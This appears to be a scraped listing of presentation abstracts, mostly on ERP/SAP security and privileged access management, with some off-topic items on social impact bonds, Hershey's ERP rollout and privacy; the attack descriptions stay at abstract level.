Business applications like ERP, CRM, SRM, and others are one of the major topics of information security, as these applications store business-critical data and any vulnerability in them can cause significant monetary and reputational loss or even a stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4: ERP security is all about Segregation Of Duties.
Our findings explode these myths.
This document discusses security concerns with web-based ERP systems. It outlines several security issues including physical security, transmission security, storage security, access security, and data security. It also describes common security problems like resource protection, data confidentiality, and authentication. The document then provides an overview of ERP architecture and the typical 3-tier architecture before examining current security solutions like role-based access control. It analyzes security in SAP/R3 systems and proposes an open security model for the future.
This document discusses managing security in ERP implementations. It identifies several types of ERP security issues, including network security, system access security and role authorization, and data security. It describes strategies for activity-based and role-based authorization in ERP systems. It also discusses data security technologies like data masking, which conceals sensitive data in test environments. Role-based authorization assigns authorization to roles, while activity-based authorization assigns transaction code sets. Data masking algorithms like shuffling, hashing and substitution can enhance data security.
CyberArk is an information security company focused on privileged account security. They help companies protect their most sensitive information and infrastructure by securing privileged accounts. The document outlines best practices for securing privileged accounts at different maturity levels - from baseline to highly effective. It recommends identifying and reducing privileged accounts, enforcing least privilege, and automating password management. For highly effective security, it suggests multi-factor authentication, privileged session recording, and anomaly detection to prevent cyber threats targeting privileged credentials.
This webinar describes how you can manage the risk of privileged accounts being compromised, creating a breach of sensitive data or other assets in your organization, through privileged access management, or PAM. PAM can reduce risks by hardening your environment in ways no other solution can, but is challenging to deploy. This webinar provides an unbiased perspective on PAM capabilities, lessons learned and deployment challenges, distilling the good practices you need to be successful. It covers:
- PAM definitions, core features and specific security and compliance drivers
- The PAM market landscape and major vendors
- How to integrate PAM with identity management, service ticketing and monitoring
- Avoiding availability and performance issues
CyberArk Training shows account security solutions that protect the most critical assets. Best CyberArk AIM Online Training covers versions 9.7 and 9.8, delivered by experts.
Con8813 securing privileged accounts with an integrated idm solution - final, by OracleIDM
The document discusses Oracle Privileged Account Manager (OPAM) and how it can be used to securely manage privileged accounts. It provides an overview of OPAM's capabilities including secure password vaulting, session management and auditing, integration with Oracle Identity Governance platforms, and support for common targets. The document also presents a use case of how OPAM could help Oracle Cloud for Industry securely manage privileged accounts by providing centralized policies and reducing risks related to disparate practices and minimal auditing/reporting.
Every IT asset has at least one local, privileged login account. This includes workstations, servers, network devices, databases, applications and more. Some assets also have privileged accounts used to run services or authenticate one application to another.
Passwords for privileged accounts are used to install software, manage the device and perform technical support functions. They are often “all powerful,” having unlimited access to system functions and data. Consequently, compromise of privileged passwords is effectively compromise of the device.
Secure management of access to privileged accounts is essential to IT security. This document identifies technical challenges and offers solutions for effectively managing large numbers of sensitive passwords.
This document discusses the importance of managing privileged accounts and outlines CyberArk's solution for privileged account security. It notes that privileged accounts exist across all IT systems and are the primary targets of attacks. The facts show that breaches are inevitable and nearly all involve stolen credentials. CyberArk's solution protects, detects, and responds to threats through an enterprise password vault, privileged session monitoring, and threat analytics. It enables control and visibility of privileged access across an organization's diverse IT environments and accounts.
The document discusses the risks of uncontrolled privileged access and advocates for implementing strong authentication using smart cards for privileged users. Privileged accounts currently rely on weak password authentication which can enable accidental or intentional data breaches. Smart cards provide multi-factor authentication that is more secure and easy for administrators to use. The document outlines how smart cards can be deployed and managed to control privileged access across an enterprise network.
A brief overview of IBM Cloud security in three slides (SaaS, IaaS and PaaS), with the remaining slides providing a snapshot of IBM's current set of SaaS, IaaS and PaaS offerings.
3 Steps to Security Intelligence - How to Build a More Secure Enterprise, by IBM Security
We are in the midst of upheaval in the world of IT Security. Attackers are highly organized and using increasingly sophisticated methods to gain entry to your most sensitive data. At the same time, Cloud and mobile are redefining the concept of the perimeter. Check out this insightful discussion of how today's CISO is building a more secure enterprise using analytics, risk-based protection, and activity monitoring to protect the most valuable assets of the organization.
For more visit: http://securityintelligence.com
PIM, PAM, PUM: Best Practices for Unix/Linux Privileged Identity & Access Man..., by Ryan Gallavin
PIM, PAM and PUM have different meanings, and interpretations, to different people. For the most part the concepts around these three far-ranging topics intersect, and for the most part we are talking about the same thing. PIM, privileged identity management; PUM, privileged user management; and PAM, privileged account management OR privileged access management. All three of these acronyms revolve around a few simple concepts: who can get to a server, how they can get to a server and what they can do when they get there.
Privileged Access Management - Unsticking Your PAM Program - CIS 2015, by Lance Peterman
This document discusses privileged access management (PAM) and provides guidance on implementing a successful PAM program. It begins by defining privileged access and explaining why PAM is necessary due to recent data breaches involving compromised privileged accounts. The document then outlines key aspects of a PAM program including using PAM as a collaborative, process-driven service. It provides examples of PAM use cases and an adoption approach involving inventory, prioritization, and integration. Finally, it discusses challenges of PAM implementation and the importance of leadership support, policy-driven processes, and considering cloud implications.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security.
The presentation gives the most important takeaways for CISOs on providing SAP Security for enterprises. It destroys the SAP Security myths, includes statistics obtained by the ERPScan Research Group, and covers future trends in SAP Security.
This document discusses security trends facing organizations and IBM's security strategy and capabilities. Key points include:
- Sophisticated attackers are finding new ways to breach security like SQL injection and watering hole attacks. Data breaches increased 500% from 2011-2013.
- New technologies like cloud and mobile introduce new risks as traditional security practices become unsustainable. Skills shortages also challenge security.
- Identity has become the new perimeter and a key focus as it is the first line of defense. Context-aware identity and access management is needed.
- IBM's security strategy focuses on delivering intelligence, integration, and expertise across frameworks addressing advanced threats, cloud, mobile, compliance, and skills shortages.
IBM Security Identity and Access Management - Portfolio, by IBM Sverige
The document provides an overview and update on IBM's Identity and Access Management products, including ISAM, ISIM, PIM, and Z/Secure. Key points discussed include:
- ISAM will support federated registry access and native Kerberos single sign-on.
- ISAM will integrate with Trusteer Pinpoint for endpoint security monitoring and policy enforcement.
- The ISAM appliance now includes SNMP for system monitoring and integration with tools like Tivoli Enterprise Monitoring.
- A converged security and integration solution is proposed using ISAM and DataPower Gateway capabilities in a single multi-channel gateway appliance.
- Identity Manager version 7.0 will be available only as a virtual appliance, providing a quicker
The Essentials | Privileged Access Management, by Ryan Gallavin
SSH is nearly ubiquitous in today’s enterprises, and is the predominant tool for managing Unix and Linux servers, and the applications and data that they host. Poor practices around the deployment and management of the SSH infrastructure could easily leave your enterprise vulnerable to a breach. Are you in control?
Lotus Notes, Microsoft Exchange.
RSA, SafeWord, ActivCard, Smart cards.
Applications: Citrix, VMware, Symantec Backup Exec, CA ARCserve, McAfee ePolicy Orchestrator.
Network Devices: Cisco, Juniper, Check Point, F5, Brocade, HP ProCurve.
In addition, Privileged Access Manager includes a robust SDK and API for developing custom connectors to any other systems or applications. This includes connectors for:
- Third party job schedulers like Control-M
- Proprietary applications and databases
- Embedded systems like routers, switches, firewalls
- Custom or legacy applications
This is the product and services portfolio of IBM Security, which is one pillar of IBM's CAMSS strategy. Products in the portfolio are still moving during early 2015 due to IBM's re-portfolioing; however, it will be categorized into 2 major parts:
1) IBM Security Products: all security software and appliances
2) IBM Security Services: all security services, including Cloud security.
Privileged access refers to system permissions that allow overriding of controls and accessing sensitive information. Privileged accounts have special permissions that can significantly impact an organization's systems and databases. Proper management of privileged access is needed, including monitoring passwords, logging activity, and ensuring access is traceable to individual users. This is the goal of Privileged Access Management (PAM).
Cutting Through the Software License Jungle: Stay Safe and Control Costs, by IBM Security
View on demand webinar: http://event.on24.com/wcc/r/1064153/E59BB80AC2DB08E80C183ADB948A4899
If you’ve ever tried to reconcile the number of software licenses issued in your company against the number of licenses that are actually being used, you know it’s a jungle out there. In fact, one study uncovered that 85% of organizations are “accidental” software pirates, meaning they’re using more software than they paid for. In addition, many enterprises are facing unplanned and unbudgeted software license “true-up” bills from their vendors that can cost millions of dollars. But you don’t have to. Join this webinar to get the facts and hack through the software license jungle with IBM BigFix. We give you a consolidated, holistic view of the software you’ve deployed to help ensure audit compliance, and at the same time help mitigate the threat of malicious software while effectively managing overall software spend.
Join this live webinar to learn how to:
- Discover all licensed and unlicensed software to pass more audits.
- Decrease software license costs by reducing the amount of unused or redundant software.
- Manage assets on hundreds (or hundreds of thousands) of Windows, Mac OS, Unix and Linux endpoints.
- Mitigate risk from malicious software including whitelist/blacklist filtering of inventory data.
Securing DevOps through Privileged Access Management, by BeyondTrust
In this presentation from the webinar by Security MVP and Microsoft Security Trusted Advisor Paula Januszkiewicz, get an overview of how privileged access management can help balance DevOps’ need for agility and speed with IT security’s need for visibility, access management, and compliance.
Key use cases covered include:
• Network Segmentation: Grouping assets, including application and resource servers, into logical units that do not trust one another
• Enforcing Appropriate Use of Credentials: IT organizations can leverage these controls to limit lateral movement in the case of a compromise and to provide a secure audit trail
• Elimination of Hard-Coded Passwords: Removing hardcoded passwords in DevOps tool configurations, build scripts, code files, test builds, production builds, etc.
You can watch the full, on-demand webinar here: https://www.beyondtrust.com/resources/webinar/securing-devops-privileged-access-management/
The document summarizes research from a webinar about privileged access management. It discusses how traditional password management methods are no longer sustainable and how privileged access management solutions aim to ensure responsible access. The research found that organizations place high importance on managing privileged access and commonly experience policy violations. Respondents felt the most important capabilities for solutions were access request/approval processes and audit logging.
10 Steps to Better Windows Privileged Access Management, by BeyondTrust
In this presentation from his webinar, Derek A. Smith, Founder, National Cybersecurity Education Center, delves into the strategies and techniques attackers use to gain privileged access to systems, and how you can stop them. This presentation covers:
- Privileged Windows accounts
- The importance of managing privileged access in Windows
- How attackers compromise Windows Privileged Accounts
- Challenges PAM can help solve in your Windows environment
- 10 Steps to better Windows privileged access management
You can also watch the full webinar on-demand here: https://www.beyondtrust.com/resources/webinar/10-steps-better-windows-privileged-access-management/
How to Build Security and Risk Management into Agile Environments, by danb02
Many organizations have adopted the agile methodology for software development and/or moved to DevOps IT support models, micro-services, containers, and the like. Often, these practices leave information security pros tearing their hair out for lack of assurance and verification processes, or an absence of separation of duty. Insisting on traditional waterfall-based security processes may not be an option. As one security engineering staff member put it, “Business developers come to central IT asking for solutions to a problem and are told it will take 6 months. Then it's late. They won’t be back.”
Risk management should be front and center in security. However, risk management is also a challenge in the iterative agile environment, especially for the number of companies that use agile project management for most or all projects, even outside development. In this presentation, Blum will address:
1) Challenges of implementing security and risk management in agile or DevOps models
2) Good practices for embedding security services in the pipeline
3) Developing an agile risk management framework
The document discusses Privileged Identity Management (PIM) solutions from CyberArk. It provides an overview of the Secure Digital Vault for securely storing credentials at rest and in motion. It also summarizes the Enterprise Password Vault for preventing threats and improving productivity by controlling privileged access. Finally, it briefly outlines the Application Identity Manager for securing and managing application identities and credentials.
This document provides guidance for evaluating privileged access management solutions. It outlines best practices for constructing a lab environment to test features like replication across multiple nodes, automatic discovery and classification of managed systems, and traversing firewalls. The evaluation should focus on advanced elements like fault tolerance, scalability, workflows and the technical capabilities of the solution.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
The document discusses social impact bonds (SIBs), which are a new type of performance-based investment for financing social programs. SIBs work by private investors funding social service programs upfront, and the government only repaying investors if the programs achieve pre-agreed outcomes that save the government money. The key differences between SIBs and traditional bonds are that SIB returns are based on project performance, not fixed, and involve higher risk. SIBs benefit communities by funding new programs, investors by creating profitable programs, and governments by increasing efficiency and saving money long-term.
The document discusses the risks of uncontrolled privileged access and advocates for implementing strong authentication using smart cards for privileged users. Privileged accounts currently rely on weak password authentication which can enable accidental or intentional data breaches. Smart cards provide multi-factor authentication that is more secure and easy for administrators to use. The document outlines how smart cards can be deployed and managed to control privileged access across an enterprise network.
A brief overview of IBM Cloud security in three slides – SaaS, IaaS and PaaS, and the others providing a snapshot of IBM's current set of SaaS, IaaS and PaaS offerings.
3 Steps to Security Intelligence - How to Build a More Secure EnterpriseIBM Security
We are in the midst of upheaval in the world of IT Security. Attackers are highly organized and using increasingly sophisticated methods to gain entry to your most sensitive data. At the same time, Cloud and mobile are redefining the concept of the perimeter. Check out this insightful discussion of how today's CISO is building a more secure enterprise using analytics, risk-based protection, and activity monitoring to protect the most valuable assets of the organization.
For more visit: http://securityintelligence.com
PIM, PAM, PUM: Best Practices for Unix/Linux Privileged Identity & Access Man...Ryan Gallavin
PIM, PAM and PUM have different meanings, and interpretations, to different people. For the most part the concepts around these three far-ranging topics intersect, and for the most part we are talking about the same thing. PIM, privileged identity management; PUM, privileged user management; and PAM, privileged account management OR privileged access management. All three of these acronyms revolve around a few simple concepts: who can get to a server, how they can get to a server and what they can do when they get there.
Privileged Access Management - Unsticking Your PAM Program - CIS 2015Lance Peterman
This document discusses privileged access management (PAM) and provides guidance on implementing a successful PAM program. It begins by defining privileged access and explaining why PAM is necessary due to recent data breaches involving compromised privileged accounts. The document then outlines key aspects of a PAM program including using PAM as a collaborative, process-driven service. It provides examples of PAM use cases and an adoption approach involving inventory, prioritization, and integration. Finally, it discusses challenges of PAM implementation and the importance of leadership support, policy-driven processes, and considering cloud implications.
The interest in SAP security has been growing exponentially, and not only among whitehats. SAP invests money and resources in security, provides guidelines, and arranges conferences, but, unfortunately, SAP users still pay little attention to SAP security
There are most important takeaways for CISOs to provide SAP Security for Enterprises. The presentation destroys the SAP Security myths, includes statistics obtained by ERPScan Research Group, and future trends in SAP Security.
This document discusses security trends facing organizations and IBM's security strategy and capabilities. Key points include:
- Sophisticated attackers are finding new ways to breach security like SQL injection and watering hole attacks. Data breaches increased 500% from 2011-2013.
- New technologies like cloud and mobile introduce new risks as traditional security practices become unsustainable. Skills shortages also challenge security.
- Identity has become the new perimeter and a key focus as it is the first line of defense. Context-aware identity and access management is needed.
- IBM's security strategy focuses on delivering intelligence, integration, and expertise across frameworks addressing advanced threats, cloud, mobile, compliance, and skills shortages.
IBM Security Identity and Access Management - PortfolioIBM Sverige
The document provides an overview and update on IBM's Identity and Access Management products, including ISAM, ISIM, PIM, and Z/Secure. Key points discussed include:
- ISAM will support federated registry access and native Kerberos single sign-on.
- ISAM will integrate with Trusteer Pinpoint for endpoint security monitoring and policy enforcement.
- The ISAM appliance now includes SNMP for system monitoring and integration with tools like Tivoli Enterprise Monitoring.
- A converged security and integration solution is proposed using ISAM and DataPower Gateway capabilities in a single multi-channel gateway appliance.
- Identity Manager version 7.0 will be available only as a virtual appliance, providing a quicker
The Essentials | Privileged Access ManagementRyan Gallavin
SSH is nearly ubiquitous in today’s enterprises, and is the predominant tool for managing unix and linux servers, and the applications and data that they host. Poor practices around the deployment and management of the SSH infrastructure could easily leave your enterprise vulnerable to a breach. Are you in control?
Lotus Notes,
Microsoft Exchange.
RSA, SafeWord, ActivCard,
Smart cards.
Applications:
Citrix, VMware, Symantec
Backup Exec, CA ARCserve,
McAfee ePolicy Orchestrator.
Network Devices:
Cisco, Juniper, Check Point,
F5, Brocade, HP ProCurve.
In addition, Privileged Access Manager includes a robust SDK and API for developing custom connectors
to any other systems or applications. This includes connectors for:
- Third party job schedulers like Control-M
- Proprietary applications and databases
- Embedded systems like routers, switches, firewalls
- Custom or legacy applications
This is the product and services portfolio of IBM Security, which is one pillar of IBM CAMSS strategy. Products in portfolio are still moving during early 2015 due to re-portfolio of IBM. However, it will be categorized in 2 major parts.
1) IBM Security Products : all security software and appliance
2) IBM Security Services : all security services, including Cloud security.
Privileged access refers to system permissions that allow overriding of controls and accessing sensitive information. Privileged accounts have special permissions that can significantly impact an organization's systems and databases. Proper management of privileged access is needed, including monitoring passwords, logging activity, and ensuring access is traceable to individual users. This is the goal of Privileged Access Management (PAM).
Cutting Through the Software License Jungle: Stay Safe and Control CostsIBM Security
View on demand webinar: http://event.on24.com/wcc/r/1064153/E59BB80AC2DB08E80C183ADB948A4899
If you’ve ever tried to reconcile the number of software licenses issued in your company against the number of licenses that are actually being used, you know it’s a jungle out there. In fact, one study uncovered that 85% of organizations are “accidental” software pirates, meaning they’re using more software than they paid for. In addition, many enterprises are facing unplanned and unbudgeted software license “true-up” bills from their vendors – that can cost millions of dollars. But you don’t have to. Join this webinar to get the facts and hack through the software licence jungle with IBM BigFix. We give you a consolidated, holistic view of the software you’ve deployed to help ensure audit compliance–and at the same time, help mitigate the threat of malicious software while effectively managing overall software spend.
Join this live webinar to learn how to:
- Discover all licensed and unlicensed software to pass more audits.
- Decrease software license costs by reducing the amount of unused or redundant software.
- Manage assets on hundreds -or hundreds of thousands- of Windows, Mac OS, Unix and Linux endpoints.
- Mitigate risk from malicious software including whitelist/blacklist filtering of inventory data.
Securing DevOps through Privileged Access ManagementBeyondTrust
In this presentation from the webinar of Security MVP and Microsoft Security Trusted Advisor, Paula Januszkiewicz,get an overview of how privileged access management can help balance DevOps’ need for agility and speed with IT security’s need for visibility, access management, and compliance.
Key use cases covered include:
• Network Segmentation: Grouping assets, including application and resource servers, into logical units that do not trust one another
• Enforcing Appropriate Use of Credentials: IT organizations can leverage these controls to limit lateral movement in the case of a compromise and to provide a secure audit trail
• Elimination of Hard-Coded Passwords: Removing hardcoded passwords in DevOps tool configurations, build scripts, code files, test builds, production builds, etc.
You can watch the full, on-demand webinar here: https://www.beyondtrust.com/resources/webinar/securing-devops-privileged-access-management/
The document summarizes research from a webinar about privileged access management. It discusses how traditional password management methods are no longer sustainable and how privileged access management solutions aim to ensure responsible access. The research found that organizations place high importance on managing privileged access and commonly experience policy violations. Respondents felt the most important capabilities for solutions were access request/approval processes and audit logging.
10 Steps to Better Windows Privileged Access Management (BeyondTrust)
In this presentation from his webinar, Derek A. Smith, Founder, National Cybersecurity Education Center, delves into the strategies and techniques attackers use to gain privileged access to systems, and how you can stop them. This presentation covers:
- Privileged Windows accounts
- The importance of managing privileged access in Windows
- How attackers compromise Windows Privileged Accounts
- Challenges PAM can help solve in your Windows environment
- 10 Steps to better Windows privileged access management
You can also watch the full webinar on-demand here: https://www.beyondtrust.com/resources/webinar/10-steps-better-windows-privileged-access-management/
How to Build Security and Risk Management into Agile Environments (danb02)
Many organizations have adopted the agile methodology for software development and/or moved to DevOps IT support models, microservices, containers, and the like. Often, these practices leave information security pros tearing their hair out over the lack of assurance and verification processes or the absence of separation of duties. Insisting on traditional waterfall-based security processes may not be an option. As one security engineering staff member put it, “Business developers come to central IT asking for solutions to a problem and are told it will take 6 months. Then it’s late. They won’t be back.”
Risk management should be front and center in security. However, risk management is also a challenge in the iterative agile environment, especially for the many companies that use agile project management for most or all projects, even outside development. In this presentation, Blum will address:
1) Challenges of implementing security and risk management in agile or DevOps models
2) Good practices for embedding security services in the pipeline
3) Developing an agile risk management framework
The document discusses Privileged Identity Management (PIM) solutions from CyberArk. It provides an overview of the Secure Digital Vault for securely storing credentials at rest and in motion. It also summarizes the Enterprise Password Vault for preventing threats and improving productivity by controlling privileged access. Finally, it briefly outlines the Application Identity Manager for securing and managing application identities and credentials.
This document provides guidance for evaluating privileged access management solutions. It outlines best practices for constructing a lab environment to test features like replication across multiple nodes, automatic discovery and classification of managed systems, and traversing firewalls. The evaluation should focus on advanced elements like fault tolerance, scalability, workflows and the technical capabilities of the solution.
This document discusses security threats related to SAP systems. It notes that SAP is one of the most widely used business applications, with over 250,000 customers worldwide. However, SAP systems also contain a wealth of sensitive information and are targets for espionage, sabotage, and fraud. The document outlines how a single compromised SAP system could provide access to critical corporate data and processes. It emphasizes that many SAP instances have not been updated in years and contain thousands of known vulnerabilities. Additionally, SAP systems are highly interconnected both within and between companies, allowing threats to spread widely. Strong security is needed to protect SAP environments and the organizations that rely on them.
Dmitry Chastukhin, Director of security consulting at ERPScan, speaks at Deepsec Conference 2012 on SAP Security.
SAP is the most popular business application. There are more than one hundred eighty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. In ERP systems, all business processes are performed, all critical information is stored.
The presentation describes how SAP Portal works and the kinds of attacks it is exposed to.
SAP security landscape. How to protect(hack) your(their) big business (ERPScan)
This document discusses security risks related to SAP applications. It describes ERPScan, a company that provides SAP security monitoring. It then discusses two specific risks: 1) Credit card data theft, where attackers could access encrypted credit card data stored in SAP tables. 2) Competitive intelligence risks, where attackers could access bidding information in SAP SRM to unfairly underbid competitors. The document emphasizes that SAP systems are complex, customized, and rarely updated, making them vulnerable to attacks.
Business applications like ERP, CRM, SRM, and others are one of the major topics in the field of computer security as these applications store business data and any vulnerabilities in these applications can cause a significant monetary and reputational loss or even stoppage of business.
Nonetheless, people still do not pay much attention to the technical side of SAP security.
In SAP, we have seen vulnerabilities at every level: architecture, software, and implementation.
Injecting evil code in your SAP J2EE systems. Security of SAP Software Deploy... (ERPScan)
SAP is the most popular business application, with more than two hundred forty thousand installations all over the world. But people spend enormous amounts of money to install it and then forget about security. Yet all business processes run in ERP systems, and all critical information is stored there: finances, HR, clients. Neglecting the security of this data is not sensible.
SAP NetWeaver Development Infrastructure (DI) is a complex system. It combines the characteristics and advantages of local development environments with a server-based development landscape, and centrally provides the means to support the software, implement new features, manage the lifecycle of a product, and so on. Its main aim is to control the deployment of components across the system landscape in a standardized manner.
The key component of the DI scheme is the Software Deployment Manager (SDM). It is connected directly to the production systems, which is why it is so critical.
The presentation describes special features of SDM and provides several SDM attack scenarios along with the ways to prevent them.
Oracle PeopleSoft applications are under attack (HITB AMS) (ERPScan)
Oracle is the second largest vendor in the ERP market, and its PeopleSoft is used by more than 7,000 companies, including about 50% of the Fortune 100. PeopleSoft applications are used worldwide, with more than 72% of customers in the USA.
On May 28, Alexey Tyurin, Head of Oracle Security Department at ERPScan, presented this talk at the Hack In The Box security conference.
The presentation describes the PeopleSoft architecture and provides several internal and external attack vectors. Let’s look at the most dangerous one. PeopleSoft systems are often accessible from the Internet, and some parts of the system have to be available before registration, for example job application forms or “Forgot your password?” forms. For this purpose, PeopleSoft systems have a special user with minimal rights, and when you open such a page the system automatically authenticates you as this user. This is an opportunity for a privilege escalation attack by brute-forcing the authentication cookie called TokenID. TokenID is generated with the SHA-1 hashing algorithm, and according to the latest information, an 8-character alphanumeric password can be brute-forced within one day on a current GPU costing about $500.
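The escalation path described above, worked through as an added example. This code is not from the talk or from ERPScan: the token layout, the user ids, the secret and the GPU hash rate are assumptions for illustration, not PeopleSoft’s real TokenID format. What it shows is why an unsalted hash over client-visible fields plus one short secret is brute-forceable offline, and what the attacker gains once the secret is known.

```python
import hashlib
import itertools
import string

# Assumed token layout for this example (NOT PeopleSoft's real TokenID format):
# an unsalted SHA-1 over fields the client can see (user id, issue time) plus
# one secret the server never sends. Only that secret protects the token.


def make_token(user_id: str, issued_at: str, node_secret: str) -> str:
    """Server side: bind the visible fields to the secret with a bare SHA-1."""
    data = f"{user_id}|{issued_at}|{node_secret}".encode()
    return hashlib.sha1(data).hexdigest()


def crack_node_secret(user_id, issued_at, token, alphabet, max_len):
    """Attacker side: offline brute force. The portal hands out a valid
    low-privilege token before login, so the attacker holds a known
    (fields, token) pair and can test candidate secrets locally, never
    touching the server or its lockout counters."""
    for length in range(1, max_len + 1):
        for cand in itertools.product(alphabet, repeat=length):
            secret = "".join(cand)
            if make_token(user_id, issued_at, secret) == token:
                return secret
    return None


def forge_token(user_id, issued_at, node_secret):
    """With the secret recovered, a token for any user id verifies as genuine:
    that is the privilege escalation."""
    return make_token(user_id, issued_at, node_secret)


def seconds_to_exhaust(alphabet_size, length, hashes_per_second):
    """Worst-case time to try every secret of the given length."""
    return alphabet_size ** length / hashes_per_second


if __name__ == "__main__":
    # Constructed demo values: a two-character secret so the search is instant.
    alphabet = string.ascii_lowercase + string.digits
    guest_token = make_token("GUEST", "1433600000", "k9")
    secret = crack_node_secret("GUEST", "1433600000", guest_token, alphabet, 2)
    print("recovered secret:", secret)
    # "PSADMIN" is an assumed privileged user id, not a name from the talk.
    forged = forge_token("PSADMIN", "1433600000", secret)
    print("forged token accepted:", forged == make_token("PSADMIN", "1433600000", "k9"))
    # The talk's figure: 8 alphanumeric characters. 10 GH/s is an assumed
    # SHA-1 rate for one consumer GPU; the full keyspace falls in a few hours.
    print("hours for 62^8 at 10 GH/s: %.1f" % (seconds_to_exhaust(62, 8, 1e10) / 3600))
```

The tiny alphabet only keeps the demo fast; the arithmetic in `seconds_to_exhaust` is what matters, and it is why the talk’s one-day figure is credible for eight alphanumeric characters. The mitigation follows from the same arithmetic: the secret has to be long and random enough that exhausting the keyspace is out of reach, because nothing else in a bare hash slows the attacker down.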
Hershey's implemented an enterprise-wide ERP system called Enterprise 21 to replace its legacy systems and prepare for Y2K. The $112 million project was rushed to meet an aggressive deadline, using a big bang approach. This led to major issues going live, including being unable to fulfill $100 million in orders for Halloween in 1999. Key mistakes included unrealistic timelines, a big bang implementation, integrating systems from multiple vendors, and a lack of oversight. Hershey's has since recovered through a slower, more thorough implementation of mySAP and investments to strengthen its logistics infrastructure.
The interest in SAP security is growing exponentially, and not only among whitehats. Unfortunately, SAP users still pay little attention to SAP security.
The findings were presented at RSA APAC Conference 2013.
This research focuses on statistics of SAP Vulnerabilities, threats from the Internet, known incidents and future trends.
EAS-SEC: Framework for securing business applications (ERPScan)
For a long time, ERP security was synonymous with segregation of duties. That has changed: there are now three areas of business application security, namely SOD, custom code security, and application platform security. SAP customers are aware of problems with their SAP installations, but they still don’t know where to start solving them.
The aim of EAS-SEC (http://eas-sec.org/) is to raise awareness of enterprise application security problems and to create guidelines and tools for enterprise application security assessment.
Practical SAP pentesting workshop (NullCon Goa) (ERPScan)
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor, with more than 250,000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at NullCon Goa Conference is a practical SAP pentesting guide.
The document summarizes key points about privacy in e-commerce from a presentation given by Aleksandr Yampolskiy, head of security and compliance at Gilt Groupe. It discusses how much personal information is readily available online, the difference between privacy and security, why people disclose personal information, challenges with privacy in e-commerce, and solutions companies can implement like having a clear privacy policy and controlling access to customer data.
Hershey, a leading chocolate manufacturer, needed to replace its legacy systems to address Y2K issues and enable more efficient operations. It implemented SAP, Siebel, and Manugistics software in a big bang approach over 30 months. However, the system went live during their busiest season, and they were unable to fulfill Halloween orders, which significantly hurt sales and profits. Key lessons learned were that enterprise software requires business process change, adequate testing is needed, and careful timing of go-live is important. After upgrades and improvements, Hershey now has nearly 99.96% inventory accuracy and can fulfill orders within 24-48 hours.
The “Privacy Today” presentation was written for the IAPP by Professor Peter Swire of the Moritz College of Law of the Ohio State University. The materials cover the definition of privacy, ways to protect privacy, privacy harms, and fair information practices. The “Privacy Today” presentation is designed for college and university students.
Licensed under Creative Commons Attribution 3.0 Unported
This document discusses information privacy and its technical, organizational, and social implications. It begins by defining information privacy and the relationship between data collection, technology, public expectations of privacy, and legal issues. It then covers topics like personally identifiable information, the types of data collected online, and technical tools and devices related to privacy. The document also addresses the costs of information privacy for governments, companies, and consumers. It discusses perspectives on privacy from different generations and countries. Finally, it covers organizational privacy policies and standards, as well as some high-profile data breach cases and the importance of information security.
This document discusses securing enterprise business applications. It notes that major companies rely on applications like SAP, Oracle, and Microsoft Dynamics for critical functions. However, these applications are often vulnerable to attacks like espionage, sabotage, and fraud due to issues like outdated versions, poor patching processes, and internet accessibility. The document argues that securing these widely implemented but vulnerable applications is essential for protecting companies and their sensitive data, operations, and financials.
The document discusses security issues related to SAP applications. It outlines 13 ways that SAP systems can be exploited to damage businesses. It then provides recommendations on how to assess security risks, prioritize updates, and comply with regulations to better protect SAP systems. The document also notes that ERPScan has discovered over 3,000 vulnerabilities in SAP products since 2007 and discusses the business risks of espionage, sabotage, and fraud if SAP systems are compromised.
Practical pentesting of ERPs and business applications (ERPScan)
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in the company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. Industrial espionage, sabotage and fraud or insider embezzlement may be very effective if targeted at the victim’s ERP system and cause significant damage to the business.
The presentation describes the specificity of ERP pentesting and focuses on SAP NetWeaver JAVA and Oracle PeopleSoft pentesting.
Practical SAP pentesting (B-Sides San Paulo) (ERPScan)
All business processes are generally contained in ERP systems. Any information an attacker might want is stored in a company’s ERP. This information can include financial, customer or public relations, intellectual property, personally identifiable information and more. And SAP is the most popular business application vendor, with more than 250,000 customers worldwide.
The workshop conducted by Alexander Polyakov, CTO of ERPScan, at B-Sides Conference 2014 (San Paulo) is a practical SAP pentesting guide.
Forgotten world - Corporate Business Application Systems (ERPScan)
This document discusses penetration testing of enterprise resource planning (ERP) systems. It notes that ERP systems are complex, mission-critical applications that contain sensitive business and financial data. Penetration testing ERP systems requires in-depth knowledge of business processes, custom implementations, and various operating systems, databases, and hardware platforms used. The goal is to identify risks like data exposure or business disruption, not just gaining shell access. Exploits also need to be carefully adapted to avoid unintended impacts to the system.
Zero Trust And Best Practices for Securing Endpoint Apps on May 24th 2021 (Teemu Tiainen)
The great cyber security expert Sami Laiho returned as a keynote speaker with the theme of Zero Trust, but this time from the point of view of securing endpoint applications.
Sami Laiho is an internationally renowned and recognized specialist in access rights and endpoint security. In this webinar, Laiho and Centero's Juha Haapsaari discussed the Zero Trust model and securing endpoint applications – even in environments of over 100,000 workstations.
These are some of the themes we covered:
• How to ease your workload with allow-listing.
• Is allow-listing difficult? (A hint: it is not.)
• Implementing AppLocker to trim down your application portfolio.
• Restricting admin rights to control your IT environment.
• Managing and updating applications after allow-listing operations.
Zero Trust is a new paradigm for cyber security in organizations. Modern IT environments are complex by nature, and both users and devices are constantly on the move. Traditional methods are not sufficient to properly secure this kind of environment, and that’s where Zero Trust comes in.
